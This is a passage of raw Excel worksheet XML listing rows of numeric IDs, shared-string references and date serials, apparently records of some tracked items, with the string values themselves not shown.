      </c>
      <c r="E34" s="9">
        <v>237838</v>
      </c>
      <c r="F34" s="9" t="s">
        <v>1655</v>
      </c>
      <c r="G34" s="10">
        <v>41312.727777777778</v>
      </c>
      <c r="H34" s="9">
        <v>395659</v>
      </c>
      <c r="I34" s="9" t="s">
        <v>1656</v>
      </c>
      <c r="J34" s="10">
        <v>41312.61041666667</v>
      </c>
      <c r="K34" s="3" t="s">
        <v>142</v>
      </c>
      <c r="L34" s="4">
        <v>3</v>
      </c>
      <c r="M34" s="4">
        <v>1</v>
      </c>
      <c r="N34" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O34" s="3"/>
      <c r="P34" s="3"/>
      <c r="Q34" s="3"/>
    </row>
    <row r="35" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A35" s="9">
        <v>2815</v>
      </c>
      <c r="B35" s="9" t="s">
        <v>853</v>
      </c>
      <c r="C35" s="9" t="s">
        <v>1713</v>
      </c>
      <c r="D35" s="9" t="s">
        <v>1714</v>
      </c>
      <c r="E35" s="9">
        <v>116</v>
      </c>
      <c r="F35" s="9" t="s">
        <v>1705</v>
      </c>
      <c r="G35" s="10">
        <v>41037.185416666667</v>
      </c>
      <c r="H35" s="9">
        <v>1039608</v>
      </c>
      <c r="I35" s="9" t="s">
        <v>1715</v>
      </c>
      <c r="J35" s="10">
        <v>41033.409722222219</v>
      </c>
      <c r="K35" s="9" t="s">
        <v>854</v>
      </c>
      <c r="L35" s="7">
        <v>4</v>
      </c>
      <c r="M35" s="7">
        <v>2</v>
      </c>
      <c r="N35" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="36" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A36" s="3">
        <v>3115</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>143</v>
      </c>
      <c r="C36" s="9" t="s">
        <v>1716</v>
      </c>
      <c r="D36" s="9" t="s">
        <v>1717</v>
      </c>
      <c r="E36" s="9">
        <v>38765</v>
      </c>
      <c r="F36" s="9" t="s">
        <v>1718</v>
      </c>
      <c r="G36" s="10">
        <v>40412.322916666664</v>
      </c>
      <c r="H36" s="9">
        <v>38765</v>
      </c>
      <c r="I36" s="9" t="s">
        <v>1718</v>
      </c>
      <c r="J36" s="10">
        <v>40412.316666666666</v>
      </c>
      <c r="K36" s="3" t="s">
        <v>144</v>
      </c>
      <c r="L36" s="4">
        <v>3</v>
      </c>
      <c r="M36" s="4">
        <v>1</v>
      </c>
      <c r="N36" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O36" s="3"/>
      <c r="P36" s="3"/>
      <c r="Q36" s="3"/>
    </row>
    <row r="37" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A37" s="3">
        <v>4313</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>145</v>
      </c>
      <c r="C37" s="9" t="s">
        <v>1719</v>
      </c>
      <c r="D37" s="9" t="s">
        <v>1720</v>
      </c>
      <c r="E37" s="9">
        <v>17</v>
      </c>
      <c r="F37" s="9" t="s">
        <v>1721</v>
      </c>
      <c r="G37" s="10">
        <v>40647.631944444445</v>
      </c>
      <c r="H37" s="9">
        <v>63550</v>
      </c>
      <c r="I37" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J37" s="10">
        <v>40641.654166666667</v>
      </c>
      <c r="K37" s="3" t="s">
        <v>146</v>
      </c>
      <c r="L37" s="4">
        <v>3</v>
      </c>
      <c r="M37" s="4">
        <v>1</v>
      </c>
      <c r="N37" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O37" s="3"/>
      <c r="P37" s="3"/>
      <c r="Q37" s="3"/>
    </row>
    <row r="38" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A38" s="9">
        <v>5118</v>
      </c>
      <c r="B38" s="9" t="s">
        <v>855</v>
      </c>
      <c r="C38" s="9" t="s">
        <v>1723</v>
      </c>
      <c r="D38" s="9" t="s">
        <v>1724</v>
      </c>
      <c r="E38" s="9">
        <v>1317805</v>
      </c>
      <c r="F38" s="9" t="s">
        <v>1725</v>
      </c>
      <c r="G38" s="10">
        <v>41575.613888888889</v>
      </c>
      <c r="H38" s="9">
        <v>1317805</v>
      </c>
      <c r="I38" s="9" t="s">
        <v>1725</v>
      </c>
      <c r="J38" s="10">
        <v>41575.613194444442</v>
      </c>
      <c r="K38" s="9" t="s">
        <v>856</v>
      </c>
      <c r="L38" s="7">
        <v>6</v>
      </c>
      <c r="M38" s="7">
        <v>4</v>
      </c>
      <c r="N38" s="9" t="s">
        <v>702</v>
      </c>
    </row>
    <row r="39" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A39" s="9">
        <v>5791</v>
      </c>
      <c r="B39" s="9" t="s">
        <v>857</v>
      </c>
      <c r="C39" s="9" t="s">
        <v>1726</v>
      </c>
      <c r="D39" s="9" t="s">
        <v>1727</v>
      </c>
      <c r="E39" s="9">
        <v>133</v>
      </c>
      <c r="F39" s="9" t="s">
        <v>1728</v>
      </c>
      <c r="G39" s="10">
        <v>41397.396527777775</v>
      </c>
      <c r="H39" s="9">
        <v>751527</v>
      </c>
      <c r="I39" s="9" t="s">
        <v>1729</v>
      </c>
      <c r="J39" s="10">
        <v>41227.579861111109</v>
      </c>
      <c r="K39" s="9" t="s">
        <v>858</v>
      </c>
      <c r="L39" s="7">
        <v>4</v>
      </c>
      <c r="M39" s="7">
        <v>2</v>
      </c>
      <c r="N39" s="9" t="s">
        <v>702</v>
      </c>
      <c r="O39" s="9" t="s">
        <v>707</v>
      </c>
    </row>
    <row r="40" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A40" s="9">
        <v>5948</v>
      </c>
      <c r="B40" s="9" t="s">
        <v>859</v>
      </c>
      <c r="C40" s="9" t="s">
        <v>1730</v>
      </c>
      <c r="D40" s="9" t="s">
        <v>1731</v>
      </c>
      <c r="E40" s="9">
        <v>383</v>
      </c>
      <c r="F40" s="9" t="s">
        <v>1732</v>
      </c>
      <c r="G40" s="10">
        <v>39868.612500000003</v>
      </c>
      <c r="H40" s="9">
        <v>16587</v>
      </c>
      <c r="I40" s="9" t="s">
        <v>1733</v>
      </c>
      <c r="J40" s="10">
        <v>39868.547222222223</v>
      </c>
      <c r="K40" s="9" t="s">
        <v>860</v>
      </c>
      <c r="L40" s="7">
        <v>4</v>
      </c>
      <c r="M40" s="7">
        <v>2</v>
      </c>
      <c r="N40" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="41" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A41" s="9">
        <v>6729</v>
      </c>
      <c r="B41" s="9" t="s">
        <v>861</v>
      </c>
      <c r="C41" s="9" t="s">
        <v>1734</v>
      </c>
      <c r="D41" s="9" t="s">
        <v>1735</v>
      </c>
      <c r="E41" s="9">
        <v>770</v>
      </c>
      <c r="F41" s="9" t="s">
        <v>1736</v>
      </c>
      <c r="G41" s="10">
        <v>40449.320138888892</v>
      </c>
      <c r="H41" s="9">
        <v>59087</v>
      </c>
      <c r="I41" s="9" t="s">
        <v>1737</v>
      </c>
      <c r="J41" s="10">
        <v>40448.863194444442</v>
      </c>
      <c r="K41" s="9" t="s">
        <v>862</v>
      </c>
      <c r="L41" s="7">
        <v>5</v>
      </c>
      <c r="M41" s="7">
        <v>3</v>
      </c>
      <c r="N41" s="9" t="s">
        <v>698</v>
      </c>
      <c r="Q41" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="42" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A42" s="9">
        <v>7074</v>
      </c>
      <c r="B42" s="9" t="s">
        <v>863</v>
      </c>
      <c r="C42" s="9" t="s">
        <v>1738</v>
      </c>
      <c r="D42" s="9" t="s">
        <v>1739</v>
      </c>
      <c r="E42" s="9">
        <v>2192641</v>
      </c>
      <c r="F42" s="9" t="s">
        <v>1740</v>
      </c>
      <c r="G42" s="10">
        <v>42174.507638888892</v>
      </c>
      <c r="H42" s="9">
        <v>1119343</v>
      </c>
      <c r="I42" s="9" t="s">
        <v>1741</v>
      </c>
      <c r="J42" s="10">
        <v>42040.505555555559</v>
      </c>
      <c r="K42" s="9" t="s">
        <v>864</v>
      </c>
      <c r="L42" s="7">
        <v>11</v>
      </c>
      <c r="M42" s="7">
        <v>9</v>
      </c>
      <c r="N42" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="43" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A43" s="9">
        <v>7472</v>
      </c>
      <c r="B43" s="9" t="s">
        <v>865</v>
      </c>
      <c r="C43" s="9" t="s">
        <v>1742</v>
      </c>
      <c r="D43" s="9" t="s">
        <v>1743</v>
      </c>
      <c r="E43" s="9">
        <v>856</v>
      </c>
      <c r="F43" s="9" t="s">
        <v>1744</v>
      </c>
      <c r="G43" s="10">
        <v>41291.808333333334</v>
      </c>
      <c r="H43" s="9">
        <v>1471203</v>
      </c>
      <c r="I43" s="9" t="s">
        <v>1745</v>
      </c>
      <c r="J43" s="10">
        <v>41283.249305555553</v>
      </c>
      <c r="K43" s="9" t="s">
        <v>866</v>
      </c>
      <c r="L43" s="7">
        <v>4</v>
      </c>
      <c r="M43" s="7">
        <v>2</v>
      </c>
      <c r="N43" s="9" t="s">
        <v>708</v>
      </c>
      <c r="Q43" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="44" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A44" s="3">
        <v>7678</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>147</v>
      </c>
      <c r="C44" s="9" t="s">
        <v>1746</v>
      </c>
      <c r="D44" s="9" t="s">
        <v>1747</v>
      </c>
      <c r="E44" s="9">
        <v>905</v>
      </c>
      <c r="F44" s="9" t="s">
        <v>1748</v>
      </c>
      <c r="G44" s="10">
        <v>41011.4375</v>
      </c>
      <c r="H44" s="9">
        <v>57611</v>
      </c>
      <c r="I44" s="9" t="s">
        <v>1749</v>
      </c>
      <c r="J44" s="10">
        <v>40714.836111111108</v>
      </c>
      <c r="K44" s="3" t="s">
        <v>148</v>
      </c>
      <c r="L44" s="4">
        <v>4</v>
      </c>
      <c r="M44" s="4">
        <v>2</v>
      </c>
      <c r="N44" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O44" s="3"/>
      <c r="P44" s="3"/>
      <c r="Q44" s="3"/>
    </row>
    <row r="45" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A45" s="3">
        <v>8034</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>193</v>
      </c>
      <c r="C45" s="9" t="s">
        <v>1750</v>
      </c>
      <c r="D45" s="9" t="s">
        <v>1751</v>
      </c>
      <c r="E45" s="9">
        <v>100297</v>
      </c>
      <c r="F45" s="9" t="s">
        <v>793</v>
      </c>
      <c r="G45" s="10">
        <v>43419.506249999999</v>
      </c>
      <c r="H45" s="9">
        <v>5218011</v>
      </c>
      <c r="I45" s="9" t="s">
        <v>1752</v>
      </c>
      <c r="J45" s="10">
        <v>42671.31527777778</v>
      </c>
      <c r="K45" s="3" t="s">
        <v>823</v>
      </c>
      <c r="L45" s="4">
        <v>3</v>
      </c>
      <c r="M45" s="4">
        <v>1</v>
      </c>
      <c r="N45" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O45" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P45" s="3"/>
      <c r="Q45" s="3"/>
    </row>
    <row r="46" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A46" s="3">
        <v>8078</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>194</v>
      </c>
      <c r="C46" s="9" t="s">
        <v>1753</v>
      </c>
      <c r="D46" s="9" t="s">
        <v>1754</v>
      </c>
      <c r="E46" s="9">
        <v>1043</v>
      </c>
      <c r="F46" s="9" t="s">
        <v>1755</v>
      </c>
      <c r="G46" s="10">
        <v>40644.249305555553</v>
      </c>
      <c r="H46" s="9">
        <v>204218</v>
      </c>
      <c r="I46" s="9" t="s">
        <v>1756</v>
      </c>
      <c r="J46" s="10">
        <v>40640.87222222222</v>
      </c>
      <c r="K46" s="3" t="s">
        <v>195</v>
      </c>
      <c r="L46" s="4">
        <v>3</v>
      </c>
      <c r="M46" s="4">
        <v>1</v>
      </c>
      <c r="N46" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O46" s="3"/>
      <c r="P46" s="3"/>
      <c r="Q46" s="3"/>
    </row>
    <row r="47" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A47" s="9">
        <v>8263</v>
      </c>
      <c r="B47" s="9" t="s">
        <v>867</v>
      </c>
      <c r="C47" s="9" t="s">
        <v>1757</v>
      </c>
      <c r="D47" s="9" t="s">
        <v>1758</v>
      </c>
      <c r="E47" s="9">
        <v>560648</v>
      </c>
      <c r="F47" s="9" t="s">
        <v>1634</v>
      </c>
      <c r="G47" s="10">
        <v>43172.727777777778</v>
      </c>
      <c r="H47" s="9">
        <v>1936366</v>
      </c>
      <c r="I47" s="9" t="s">
        <v>1759</v>
      </c>
      <c r="J47" s="10">
        <v>43172.72152777778</v>
      </c>
      <c r="K47" s="9" t="s">
        <v>868</v>
      </c>
      <c r="L47" s="7">
        <v>5</v>
      </c>
      <c r="M47" s="7">
        <v>3</v>
      </c>
      <c r="N47" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="48" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A48" s="9">
        <v>8348</v>
      </c>
      <c r="B48" s="9" t="s">
        <v>869</v>
      </c>
      <c r="C48" s="9" t="s">
        <v>1760</v>
      </c>
      <c r="D48" s="9" t="s">
        <v>1761</v>
      </c>
      <c r="E48" s="9">
        <v>940</v>
      </c>
      <c r="F48" s="9" t="s">
        <v>1762</v>
      </c>
      <c r="G48" s="10">
        <v>41393.720833333333</v>
      </c>
      <c r="H48" s="9">
        <v>1563422</v>
      </c>
      <c r="I48" s="9" t="s">
        <v>1763</v>
      </c>
      <c r="J48" s="10">
        <v>41392.145138888889</v>
      </c>
      <c r="K48" s="9" t="s">
        <v>870</v>
      </c>
      <c r="L48" s="7">
        <v>5</v>
      </c>
      <c r="M48" s="7">
        <v>2</v>
      </c>
      <c r="N48" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O48" s="9" t="s">
        <v>702</v>
      </c>
    </row>
    <row r="49" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A49" s="3">
        <v>8462</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>196</v>
      </c>
      <c r="C49" s="9" t="s">
        <v>1764</v>
      </c>
      <c r="D49" s="9" t="s">
        <v>1765</v>
      </c>
      <c r="E49" s="9">
        <v>234</v>
      </c>
      <c r="F49" s="9" t="s">
        <v>1766</v>
      </c>
      <c r="G49" s="10">
        <v>41808.114583333336</v>
      </c>
      <c r="H49" s="9">
        <v>3246002</v>
      </c>
      <c r="I49" s="9" t="s">
        <v>1767</v>
      </c>
      <c r="J49" s="10">
        <v>41751.671527777777</v>
      </c>
      <c r="K49" s="3" t="s">
        <v>197</v>
      </c>
      <c r="L49" s="4">
        <v>5</v>
      </c>
      <c r="M49" s="4">
        <v>3</v>
      </c>
      <c r="N49" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O49" s="3"/>
      <c r="P49" s="3"/>
      <c r="Q49" s="3"/>
    </row>
    <row r="50" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A50" s="9">
        <v>8585</v>
      </c>
      <c r="B50" s="9" t="s">
        <v>871</v>
      </c>
      <c r="C50" s="9" t="s">
        <v>1768</v>
      </c>
      <c r="D50" s="9" t="s">
        <v>1769</v>
      </c>
      <c r="E50" s="9">
        <v>4374739</v>
      </c>
      <c r="F50" s="9" t="s">
        <v>1709</v>
      </c>
      <c r="G50" s="10">
        <v>42248.412499999999</v>
      </c>
      <c r="H50" s="9">
        <v>2185245</v>
      </c>
      <c r="I50" s="9" t="s">
        <v>1770</v>
      </c>
      <c r="J50" s="10">
        <v>42247.72152777778</v>
      </c>
      <c r="K50" s="9" t="s">
        <v>872</v>
      </c>
      <c r="L50" s="7">
        <v>5</v>
      </c>
      <c r="M50" s="7">
        <v>3</v>
      </c>
      <c r="N50" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="51" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A51" s="3">
        <v>9033</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>873</v>
      </c>
      <c r="C51" s="9" t="s">
        <v>1771</v>
      </c>
      <c r="D51" s="9" t="s">
        <v>1771</v>
      </c>
      <c r="E51" s="9">
        <v>231822</v>
      </c>
      <c r="F51" s="9" t="s">
        <v>1772</v>
      </c>
      <c r="G51" s="10">
        <v>40236.843055555553</v>
      </c>
      <c r="H51" s="9">
        <v>231822</v>
      </c>
      <c r="I51" s="9" t="s">
        <v>1772</v>
      </c>
      <c r="J51" s="10">
        <v>40236.84097222222</v>
      </c>
      <c r="K51" s="3" t="s">
        <v>874</v>
      </c>
      <c r="L51" s="8">
        <v>45</v>
      </c>
      <c r="M51" s="8">
        <v>43</v>
      </c>
      <c r="N51" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O51" s="3"/>
      <c r="P51" s="3"/>
      <c r="Q51" s="3"/>
    </row>
    <row r="52" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A52" s="9">
        <v>9081</v>
      </c>
      <c r="B52" s="9" t="s">
        <v>875</v>
      </c>
      <c r="C52" s="9" t="s">
        <v>1773</v>
      </c>
      <c r="D52" s="9" t="s">
        <v>1774</v>
      </c>
      <c r="E52" s="9">
        <v>116</v>
      </c>
      <c r="F52" s="9" t="s">
        <v>1705</v>
      </c>
      <c r="G52" s="10">
        <v>41103.019444444442</v>
      </c>
      <c r="H52" s="9">
        <v>63550</v>
      </c>
      <c r="I52" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J52" s="10">
        <v>41102.755555555559</v>
      </c>
      <c r="K52" s="9" t="s">
        <v>876</v>
      </c>
      <c r="L52" s="7">
        <v>3</v>
      </c>
      <c r="M52" s="7">
        <v>1</v>
      </c>
      <c r="N52" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="53" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A53" s="9">
        <v>9508</v>
      </c>
      <c r="B53" s="12" t="s">
        <v>877</v>
      </c>
      <c r="C53" s="9" t="s">
        <v>1775</v>
      </c>
      <c r="D53" s="9" t="s">
        <v>1776</v>
      </c>
      <c r="E53" s="9">
        <v>419</v>
      </c>
      <c r="F53" s="9" t="s">
        <v>812</v>
      </c>
      <c r="G53" s="10">
        <v>41460.804861111108</v>
      </c>
      <c r="H53" s="9">
        <v>1584286</v>
      </c>
      <c r="I53" s="9" t="s">
        <v>1777</v>
      </c>
      <c r="J53" s="10">
        <v>41459.507638888892</v>
      </c>
      <c r="K53" s="9" t="s">
        <v>878</v>
      </c>
      <c r="L53" s="7">
        <v>6</v>
      </c>
      <c r="M53" s="7">
        <v>4</v>
      </c>
      <c r="N53" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="54" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A54" s="9">
        <v>9589</v>
      </c>
      <c r="B54" s="9" t="s">
        <v>879</v>
      </c>
      <c r="C54" s="9" t="s">
        <v>1778</v>
      </c>
      <c r="D54" s="9" t="s">
        <v>1779</v>
      </c>
      <c r="E54" s="9">
        <v>560648</v>
      </c>
      <c r="F54" s="9" t="s">
        <v>1634</v>
      </c>
      <c r="G54" s="10">
        <v>43172.726388888892</v>
      </c>
      <c r="H54" s="9">
        <v>1936366</v>
      </c>
      <c r="I54" s="9" t="s">
        <v>1759</v>
      </c>
      <c r="J54" s="10">
        <v>43172.720138888886</v>
      </c>
      <c r="K54" s="9" t="s">
        <v>880</v>
      </c>
      <c r="L54" s="7">
        <v>5</v>
      </c>
      <c r="M54" s="7">
        <v>3</v>
      </c>
      <c r="N54" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="55" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A55" s="9">
        <v>10314</v>
      </c>
      <c r="B55" s="12" t="s">
        <v>881</v>
      </c>
      <c r="C55" s="9" t="s">
        <v>1780</v>
      </c>
      <c r="D55" s="9" t="s">
        <v>1781</v>
      </c>
      <c r="E55" s="9">
        <v>1043</v>
      </c>
      <c r="F55" s="9" t="s">
        <v>1755</v>
      </c>
      <c r="G55" s="10">
        <v>39867.993055555555</v>
      </c>
      <c r="H55" s="9">
        <v>5640</v>
      </c>
      <c r="I55" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J55" s="10">
        <v>39867.989583333336</v>
      </c>
      <c r="K55" s="9" t="s">
        <v>882</v>
      </c>
      <c r="L55" s="7">
        <v>4</v>
      </c>
      <c r="M55" s="7">
        <v>1</v>
      </c>
      <c r="Q55" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="56" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A56" s="9">
        <v>10848</v>
      </c>
      <c r="B56" s="9" t="s">
        <v>883</v>
      </c>
      <c r="C56" s="9" t="s">
        <v>1782</v>
      </c>
      <c r="D56" s="9" t="s">
        <v>1783</v>
      </c>
      <c r="E56" s="9">
        <v>1603234</v>
      </c>
      <c r="F56" s="9" t="s">
        <v>1784</v>
      </c>
      <c r="G56" s="10">
        <v>41836.501388888886</v>
      </c>
      <c r="H56" s="9">
        <v>981914</v>
      </c>
      <c r="I56" s="9" t="s">
        <v>1785</v>
      </c>
      <c r="J56" s="10">
        <v>41395.388888888891</v>
      </c>
      <c r="K56" s="9" t="s">
        <v>884</v>
      </c>
      <c r="L56" s="7">
        <v>4</v>
      </c>
      <c r="M56" s="7">
        <v>2</v>
      </c>
      <c r="N56" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="57" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A57" s="9">
        <v>10870</v>
      </c>
      <c r="B57" s="9" t="s">
        <v>885</v>
      </c>
      <c r="C57" s="9" t="s">
        <v>1786</v>
      </c>
      <c r="D57" s="9" t="s">
        <v>1787</v>
      </c>
      <c r="E57" s="9">
        <v>50776</v>
      </c>
      <c r="F57" s="9" t="s">
        <v>1788</v>
      </c>
      <c r="G57" s="10">
        <v>40899.93472222222</v>
      </c>
      <c r="H57" s="9">
        <v>50776</v>
      </c>
      <c r="I57" s="9" t="s">
        <v>1788</v>
      </c>
      <c r="J57" s="10">
        <v>40899.934027777781</v>
      </c>
      <c r="K57" s="9" t="s">
        <v>886</v>
      </c>
      <c r="L57" s="7">
        <v>4</v>
      </c>
      <c r="M57" s="7">
        <v>2</v>
      </c>
      <c r="N57" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="58" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A58" s="9">
        <v>10905</v>
      </c>
      <c r="B58" s="9" t="s">
        <v>887</v>
      </c>
      <c r="C58" s="9" t="s">
        <v>1789</v>
      </c>
      <c r="D58" s="9" t="s">
        <v>1790</v>
      </c>
      <c r="E58" s="9">
        <v>905</v>
      </c>
      <c r="F58" s="9" t="s">
        <v>1748</v>
      </c>
      <c r="G58" s="10">
        <v>41460.306250000001</v>
      </c>
      <c r="H58" s="9">
        <v>1584286</v>
      </c>
      <c r="I58" s="9" t="s">
        <v>1777</v>
      </c>
      <c r="J58" s="10">
        <v>41459.506249999999</v>
      </c>
      <c r="K58" s="9" t="s">
        <v>888</v>
      </c>
      <c r="L58" s="7">
        <v>5</v>
      </c>
      <c r="M58" s="7">
        <v>3</v>
      </c>
      <c r="N58" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="59" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A59" s="9">
        <v>11291</v>
      </c>
      <c r="B59" s="9" t="s">
        <v>889</v>
      </c>
      <c r="C59" s="9" t="s">
        <v>1791</v>
      </c>
      <c r="D59" s="9" t="s">
        <v>1792</v>
      </c>
      <c r="E59" s="9">
        <v>1344</v>
      </c>
      <c r="F59" s="9" t="s">
        <v>1793</v>
      </c>
      <c r="G59" s="10">
        <v>42199.488194444442</v>
      </c>
      <c r="H59" s="9">
        <v>1402846</v>
      </c>
      <c r="I59" s="9" t="s">
        <v>1794</v>
      </c>
      <c r="J59" s="10">
        <v>42199.075694444444</v>
      </c>
      <c r="K59" s="9" t="s">
        <v>890</v>
      </c>
      <c r="L59" s="7">
        <v>9</v>
      </c>
      <c r="M59" s="7">
        <v>6</v>
      </c>
      <c r="N59" s="9" t="s">
        <v>703</v>
      </c>
      <c r="O59" s="9" t="s">
        <v>699</v>
      </c>
      <c r="Q59" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="60" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A60" s="9">
        <v>11686</v>
      </c>
      <c r="B60" s="9" t="s">
        <v>891</v>
      </c>
      <c r="C60" s="9" t="s">
        <v>1795</v>
      </c>
      <c r="D60" s="9" t="s">
        <v>1796</v>
      </c>
      <c r="E60" s="9">
        <v>207421</v>
      </c>
      <c r="F60" s="9" t="s">
        <v>802</v>
      </c>
      <c r="G60" s="10">
        <v>41459.51458333333</v>
      </c>
      <c r="H60" s="9">
        <v>1584286</v>
      </c>
      <c r="I60" s="9" t="s">
        <v>1777</v>
      </c>
      <c r="J60" s="10">
        <v>41459.506944444445</v>
      </c>
      <c r="K60" s="9" t="s">
        <v>892</v>
      </c>
      <c r="L60" s="7">
        <v>3</v>
      </c>
      <c r="M60" s="7">
        <v>1</v>
      </c>
      <c r="N60" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="61" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A61" s="3">
        <v>12087</v>
      </c>
      <c r="B61" s="3" t="s">
        <v>198</v>
      </c>
      <c r="C61" s="9" t="s">
        <v>1797</v>
      </c>
      <c r="D61" s="9" t="s">
        <v>1798</v>
      </c>
      <c r="E61" s="9">
        <v>905</v>
      </c>
      <c r="F61" s="9" t="s">
        <v>1748</v>
      </c>
      <c r="G61" s="10">
        <v>41367.324305555558</v>
      </c>
      <c r="H61" s="9">
        <v>830691</v>
      </c>
      <c r="I61" s="9" t="s">
        <v>1799</v>
      </c>
      <c r="J61" s="10">
        <v>41366.654861111114</v>
      </c>
      <c r="K61" s="3" t="s">
        <v>199</v>
      </c>
      <c r="L61" s="4">
        <v>3</v>
      </c>
      <c r="M61" s="4">
        <v>1</v>
      </c>
      <c r="N61" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O61" s="3"/>
      <c r="P61" s="3"/>
      <c r="Q61" s="3"/>
    </row>
    <row r="62" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A62" s="3">
        <v>13756</v>
      </c>
      <c r="B62" s="3" t="s">
        <v>234</v>
      </c>
      <c r="C62" s="9" t="s">
        <v>1800</v>
      </c>
      <c r="D62" s="9" t="s">
        <v>1801</v>
      </c>
      <c r="E62" s="9">
        <v>905</v>
      </c>
      <c r="F62" s="9" t="s">
        <v>1748</v>
      </c>
      <c r="G62" s="10">
        <v>42431.53125</v>
      </c>
      <c r="H62" s="9">
        <v>122718</v>
      </c>
      <c r="I62" s="9" t="s">
        <v>1802</v>
      </c>
      <c r="J62" s="10">
        <v>41956.660416666666</v>
      </c>
      <c r="K62" s="3" t="s">
        <v>235</v>
      </c>
      <c r="L62" s="4">
        <v>3</v>
      </c>
      <c r="M62" s="4">
        <v>1</v>
      </c>
      <c r="N62" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O62" s="3"/>
      <c r="P62" s="3"/>
      <c r="Q62" s="3"/>
    </row>
    <row r="63" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A63" s="9">
        <v>13857</v>
      </c>
      <c r="B63" s="9" t="s">
        <v>893</v>
      </c>
      <c r="C63" s="9" t="s">
        <v>1803</v>
      </c>
      <c r="D63" s="9" t="s">
        <v>1804</v>
      </c>
      <c r="E63" s="9">
        <v>4279</v>
      </c>
      <c r="F63" s="9" t="s">
        <v>1805</v>
      </c>
      <c r="G63" s="10">
        <v>40142.829861111109</v>
      </c>
      <c r="H63" s="9">
        <v>1649</v>
      </c>
      <c r="I63" s="9" t="s">
        <v>1806</v>
      </c>
      <c r="J63" s="10">
        <v>39824.923611111109</v>
      </c>
      <c r="K63" s="9" t="s">
        <v>894</v>
      </c>
      <c r="L63" s="7">
        <v>6</v>
      </c>
      <c r="M63" s="7">
        <v>4</v>
      </c>
      <c r="N63" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="64" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A64" s="3">
        <v>14960</v>
      </c>
      <c r="B64" s="3" t="s">
        <v>236</v>
      </c>
      <c r="C64" s="9" t="s">
        <v>1807</v>
      </c>
      <c r="D64" s="9" t="s">
        <v>1808</v>
      </c>
      <c r="E64" s="9">
        <v>770</v>
      </c>
      <c r="F64" s="9" t="s">
        <v>1736</v>
      </c>
      <c r="G64" s="10">
        <v>43345.696527777778</v>
      </c>
      <c r="H64" s="9">
        <v>480982</v>
      </c>
      <c r="I64" s="9" t="s">
        <v>1809</v>
      </c>
      <c r="J64" s="10">
        <v>43345.544444444444</v>
      </c>
      <c r="K64" s="3" t="s">
        <v>237</v>
      </c>
      <c r="L64" s="4">
        <v>4</v>
      </c>
      <c r="M64" s="4">
        <v>2</v>
      </c>
      <c r="N64" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O64" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P64" s="3" t="s">
        <v>697</v>
      </c>
      <c r="Q64" s="3"/>
    </row>
